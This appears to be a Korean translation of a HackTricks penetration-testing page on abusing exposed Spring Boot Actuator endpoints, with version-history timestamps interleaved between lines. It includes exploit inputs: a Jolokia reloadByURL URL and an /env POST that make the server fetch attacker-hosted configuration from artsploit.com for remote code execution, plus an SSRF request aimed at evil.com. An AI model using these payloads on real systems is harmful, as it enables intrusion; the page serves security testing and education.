2022-10-10 09:20:50 +00:00
# Spring Actuators
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 21:30:13 +00:00
< summary > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > 를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요< strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 21:30:13 +00:00
HackTricks를 지원하는 다른 방법:
2023-12-31 01:24:39 +00:00
2024-02-10 21:30:13 +00:00
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )를 확인하세요!
* [**공식 PEASS & HackTricks 스웨그** ](https://peass.creator-spring.com )를 얻으세요.
* 독점적인 [**NFT** ](https://opensea.io/collection/the-peass-family ) 컬렉션인 [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )를 발견하세요.
* 💬 [**Discord 그룹** ](https://discord.gg/hRep4RUj7f ) 또는 [**텔레그램 그룹** ](https://t.me/peass )에 **참여**하거나 **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )을 **팔로우**하세요.
* **HackTricks**와 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
2022-04-28 16:01:33 +00:00
< / details >
2023-03-02 18:08:43 +00:00
## **Spring Auth Bypass**
2023-05-04 23:22:39 +00:00
< figure > < img src = "../../.gitbook/assets/image (5) (2).png" alt = "" > < figcaption > < / figcaption > < / figure >
2023-03-02 18:08:43 +00:00
2024-02-10 21:30:13 +00:00
**[https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)**에서 확인하세요.
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
## Spring Boot Actuators 악용
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
**원본 게시물은 [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators ](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators )에서 확인하세요.**
2023-03-02 18:08:43 +00:00
2024-02-10 21:30:13 +00:00
### **주요 포인트:**
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
- Spring Boot Actuators는 `/health` , `/trace` , `/beans` , `/env` 등의 엔드포인트를 등록합니다. 버전 1부터 1.4까지는 이러한 엔드포인트에 인증 없이 접근할 수 있습니다. 버전 1.5부터는 기본적으로 `/health` 와 `/info` 만 민감하지 않지만, 개발자들은 이 보안을 종종 비활성화합니다.
- 특정 Actuator 엔드포인트는 민감한 데이터를 노출하거나 해로운 작업을 허용할 수 있습니다:
- `/dump` , `/trace` , `/logfile` , `/shutdown` , `/mappings` , `/env` , `/actuator/env` , `/restart` , `/heapdump` 등입니다.
- Spring Boot 1.x에서는 Actuator가 루트 URL에 등록되지만, 2.x에서는 `/actuator/` 기본 경로 아래에 등록됩니다.
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
### **악용 기법:**
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
1. ** '/jolokia'를 통한 원격 코드 실행**:
- `/jolokia` 액추에이터 엔드포인트는 Jolokia 라이브러리를 노출시키며, MBeans에 대한 HTTP 액세스를 허용합니다.
- `reloadByURL` 작업은 외부 URL에서 로깅 구성을 다시로드할 수 있도록 악용될 수 있으며, 이는 조작된 XML 구성을 통한 블라인드 XXE 또는 원격 코드 실행으로 이어질 수 있습니다.
- 예시 악용 URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml` .
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
2. ** '/env'를 통한 구성 수정**:
- Spring Cloud 라이브러리가 존재하는 경우, `/env` 엔드포인트를 통해 환경 속성을 수정할 수 있습니다.
- 속성을 조작하여 Eureka serviceURL의 XStream 역직렬화 취약점과 같은 취약점을 악용할 수 있습니다.
- 예시 악용 POST 요청:
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
```
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
```
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
3. **기타 유용한 설정** :
- `spring.datasource.tomcat.validationQuery` , `spring.datasource.tomcat.url` , `spring.datasource.tomcat.max-active` 와 같은 속성은 SQL 인젝션 또는 데이터베이스 연결 문자열 변경과 같은 다양한 악용을 위해 조작될 수 있습니다.
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
### **추가 정보:**
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
- 기본 액추에이터의 포괄적인 목록은 [여기 ](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt )에서 찾을 수 있습니다.
- Spring Boot 2.x의 `/env` 엔드포인트는 속성 수정을 위해 JSON 형식을 사용하지만, 일반적인 개념은 동일합니다.
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
### **관련 주제:**
2020-10-15 10:27:50 +00:00
2024-02-04 16:10:29 +00:00
1. **Env + H2 RCE** :
2024-02-10 21:30:13 +00:00
- `/env` 엔드포인트와 H2 데이터베이스의 조합을 악용하는 방법에 대한 자세한 내용은 [여기 ](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database )에서 확인할 수 있습니다.
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
2. **잘못된 경로명 해석을 통한 Spring Boot SSRF** :
- Spring 프레임워크의 HTTP 경로명에서 매트릭스 매개변수(`;`)의 처리는 서버 측 요청 위조(SSRF)를 악용할 수 있습니다.
- 예시 악용 요청:
2020-10-15 10:27:50 +00:00
2024-02-10 21:30:13 +00:00
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
2020-10-15 10:27:50 +00:00
2022-04-28 16:01:33 +00:00
< details >
2024-02-10 21:30:13 +00:00
< summary > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > 를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요< strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 21:30:13 +00:00
HackTricks를 지원하는 다른 방법:
2023-12-31 01:24:39 +00:00
2024-02-10 21:30:13 +00:00
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )를 확인하세요!
* [**공식 PEASS & HackTricks 스웨그** ](https://peass.creator-spring.com )를 얻으세요.
* 독점적인 [**NFT** ](https://opensea.io/collection/the-peass-family ) 컬렉션인 [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )를 발견하세요.
* 💬 [**Discord 그룹** ](https://discord.gg/hRep4RUj7f ) 또는 [**텔레그램 그룹** ](https://t.me/peass )에 **참여**하거나 **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )을 **팔로우**하세요.
* **HackTricks**와 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
2022-04-28 16:01:33 +00:00
< / details >
